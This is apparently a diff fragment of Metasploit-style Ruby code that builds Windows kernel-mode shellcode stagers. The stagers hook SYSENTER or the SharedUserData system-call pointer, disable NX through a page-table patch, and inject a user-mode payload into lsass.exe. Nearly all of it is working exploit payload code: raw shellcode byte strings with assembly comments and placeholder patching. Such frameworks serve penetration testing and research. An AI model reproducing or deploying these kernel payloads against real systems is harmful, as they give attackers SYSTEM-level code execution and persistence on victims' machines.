+	# Full assembly source at:
+	# /msf3/external/source/shellcode/windows/x86/src/kernel/stager_sysenter_hook.asm
+	#
+	# This payload works as follows:
+	# * Our sysenter handler and ring3 stagers are copied over to safe location.
+	# * The SYSENTER_EIP_MSR is patched to point to our sysenter handler.
+	# * The srv2.sys thread we are in is placed in a halted state.
+	# * Upon any ring3 proces issuing a sysenter command our ring0 sysenter handler gets control.
+	# * The ring3 return address is modified to force our ring3 stub to be called if certain conditions met.
+	# * If NX is enabled we patch the respective page table entry to disable it for the ring3 code.
+	# * Control is passed to real sysenter handler, upon the real sysenter handler finishing, sysexit will return to our ring3 stager.
+	# * If the ring3 stager is executing in the desired process our sysenter handler is removed and the real ring3 payload called.
+	#
+	def self.stager_sysenter_hook( opts = {} )
+		# The page table entry for StagerAddressUser, used to bypass NX in ring3 on PAE enabled systems (should be static).
+		pagetable = opts['StagerAddressPageTable'] || 0xC03FFF00
+		# The address in kernel memory where we place our ring0 and ring3 stager (no ASLR).
+		kstager   = opts['StagerAddressKernel'] || 0xFFDF0400
+		# The address in shared memory (addressable from ring3) where we can find our ring3 stager (no ASLR).
+		ustager   = opts['StagerAddressUser'] || 0x7FFE0400
+		# Target SYSTEM process to inject ring3 payload into.
+		process   = (opts['RunInWin32Process'] || 'lsass.exe').unpack('C*')
+		# A simple hash of the process name based on the first 4 wide chars.
+		# Assumes process is located at '*:\windows\system32\'.
+		checksum  = process[0] + ( process[2] << 8 )  + ( process[1] << 16 ) + ( process[3] << 24 )
+		# The ring0 -> ring3 payload blob.
+		r0 =	"\xFC\xFA\xEB\x1E\x5E\x68\x76\x01\x00\x00\x59\x0F\x32\x89\x46\x60" +
+				"\x8B\x7E\x64\x89\xF8\x0F\x30\xB9\x41\x41\x41\x41\xF3\xA4\xFB\xF4" +
+				"\xEB\xFD\xE8\xDD\xFF\xFF\xFF\x6A\x00\x9C\x60\xE8\x00\x00\x00\x00" +
+				"\x58\x8B\x58\x57\x89\x5C\x24\x24\x81\xF9\xDE\xC0\xAD\xDE\x75\x10" +
+				"\x68\x76\x01\x00\x00\x59\x89\xD8\x31\xD2\x0F\x30\x31\xC0\xEB\x34" +
+				"\x8B\x32\x0F\xB6\x1E\x66\x81\xFB\xC3\x00\x75\x28\x8B\x58\x5F\x8D" +
+				"\x5B\x6C\x89\x1A\xB8\x01\x00\x00\x80\x0F\xA2\x81\xE2\x00\x00\x10" +
+				"\x00\x74\x11\xBA\x45\x45\x45\x45\x81\xC2\x04\x00\x00\x00\x81\x22" +
+				"\xFF\xFF\xFF\x7F\x61\x9D\xC3\xFF\xFF\xFF\xFF\x42\x42\x42\x42\x43" +
+				"\x43\x43\x43\x60\x6A\x30\x58\x99\x64\x8B\x18\x39\x53\x0C\x74\x2E" +
+				"\x8B\x43\x10\x8B\x40\x3C\x83\xC0\x28\x8B\x08\x03\x48\x03\x81\xF9" +
+				"\x44\x44\x44\x44\x75\x18\xE8\x0A\x00\x00\x00\xE8\x10\x00\x00\x00" +
+				"\xE9\x09\x00\x00\x00\xB9\xDE\xC0\xAD\xDE\x89\xE2\x0F\x34\x61\xC3"
+		# The ring3 payload.
+		r3 = opts['UserModeStub'] || ''
+		# Patch in the required values.
+		r0 = r0.gsub( [ 0x41414141 ].pack("V"), [ ( r0.length + r3.length - 0x1C ) ].pack("V") )
+		r0 = r0.gsub( [ 0x42424242 ].pack("V"), [ kstager ].pack("V") )
+		r0 = r0.gsub( [ 0x43434343 ].pack("V"), [ ustager ].pack("V") )
+		r0 = r0.gsub( [ 0x44444444 ].pack("V"), [ checksum ].pack("V") )
+		r0 = r0.gsub( [ 0x45454545 ].pack("V"), [ pagetable ].pack("V") )
+		# Return the ring0 -> ring3 payload blob with the real ring3 payload appended.
+		return r0 + r3
+	end
+	#
+	# XP SP2/2K3 SP1 ONLY
+	#
+	# Returns a kernel-mode stager that transitions from r0 to r3 by placing
+	# code in an unused portion of SharedUserData and then pointing the
+	# SystemCall attribute to that unused portion.  This has the effect of
+	# causing the custom code to be called every time a user-mode process
+	# tries to make a system call.  The returned payload also checks to make
+	# sure that it's running in the context of lsass before actually running
+	# the embedded payload.
+	#
+	def self.sud_syscall_hook(opts = {})
+		r0_recovery = opts['RecoveryStub'] || Recovery.default
+		r3_payload  = opts['UserModeStub'] || ''
+		r3_prefix   = _run_only_in_win32proc_stub("\xff\x25\x08\x03\xfe\x7f", opts)
+		r3_size     = ((r3_prefix.length + r3_payload.length + 3) & ~0x3) / 4
+		r0_stager =
+			"\xEB" + [0x22 + r0_recovery.length].pack('C') + # jmp short 0x27
+			"\xBB\x01\x03\xDF\xFF"                         + # mov ebx,0xffdf0301
+			"\x4B"                                         + # dec ebx
+			"\xFC"                                         + # cld
+			"\x8D\x7B\x7C"                                 + # lea edi,[ebx+0x7c]
+			"\x5E"                                         + # pop esi
+			"\x6A" + [r3_size].pack('C')                   + # push byte num_dwords
+			"\x59"                                         + # pop ecx
+			"\xF3\xA5"                                     + # rep movsd
+			"\xBF\x7C\x03\xFE\x7F"                         + # mov edi,0x7ffe037c
+			"\x39\x3B"                                     + # cmp [ebx],edi
+			"\x74\x09"                                     + # jz
+			"\x8B\x03"                                     + # mov eax,[ebx]
+			"\x8D\x4B\x08"                                 + # lea ecx,[ebx+0x8]
+			"\x89\x01"                                     + # mov [ecx],eax
+			"\x89\x3B"                                     + # mov [ebx],edi
+			r0_recovery +
+			"\xe8" + [0xffffffd9 - r0_recovery.length].pack('V') + # call 0x2
+			r3_prefix +
+			r3_payload
+		return r0_stager
+	end
+protected
+	#
+	# This stub is used by stagers to check to see if the code is
+	# running in the context of a user-mode system process.  By default,
+	# this process is lsass.exe.  If it isn't, it runs the code
+	# specified by append.  Otherwise, it jumps past that code and
+	# into what should be the expected r3 payload to execute.  This
+	# stub also makes sure that the payload does not run more than
+	# once.
+	#
+	def self._run_only_in_win32proc_stub(append = '', opts = {})
+		opts['RunInWin32Process'] = "lsass.exe" if opts['RunInWin32Process'].nil?
+		process  = opts['RunInWin32Process'].downcase
+		checksum =
+			process[0]         +
+			(process[2] << 8)  +
+			(process[1] << 16) +
+			(process[3] << 24)
+		"\x60"                                 + # pusha
+		"\x6A\x30"                             + # push byte +0x30
+		"\x58"                                 + # pop eax
+		"\x99"                                 + # cdq
+		"\x64\x8B\x18"                         + # mov ebx,[fs:eax]
+		"\x39\x53\x0C"                         + # cmp [ebx+0xc],edx
+		"\x74\x26"                             + # jz 0x5f
+		"\x8B\x5B\x10"                         + # mov ebx,[ebx+0x10]
+		"\x8B\x5B\x3C"                         + # mov ebx,[ebx+0x3c]
+		"\x83\xC3\x28"                         + # add ebx,byte +0x28
+		"\x8B\x0B"                             + # mov ecx,[ebx]
+		"\x03\x4B\x03"                         + # add ecx,[ebx+0x3]
+		"\x81\xF9" + [checksum].pack('V')      + # cmp ecx,prochash
+		"\x75\x10"                             + # jnz 0x5f
+		"\x64\x8B\x18"                         + # mov ebx,[fs:eax]
+		"\x43"                                 + # inc ebx
+		"\x43"                                 + # inc ebx
+		"\x43"                                 + # inc ebx
+		"\x80\x3B\x01"                         + # cmp byte [ebx],0x1
+		"\x74\x05"                             + # jz 0x5f
+		"\xC6\x03\x01"                         + # mov byte [ebx],0x1
+		"\xEB" + [append.length + 1].pack('C') + # jmp stager
+		"\x61" + append						        # restore regs
+	end
+end
+end
+end
+end
+end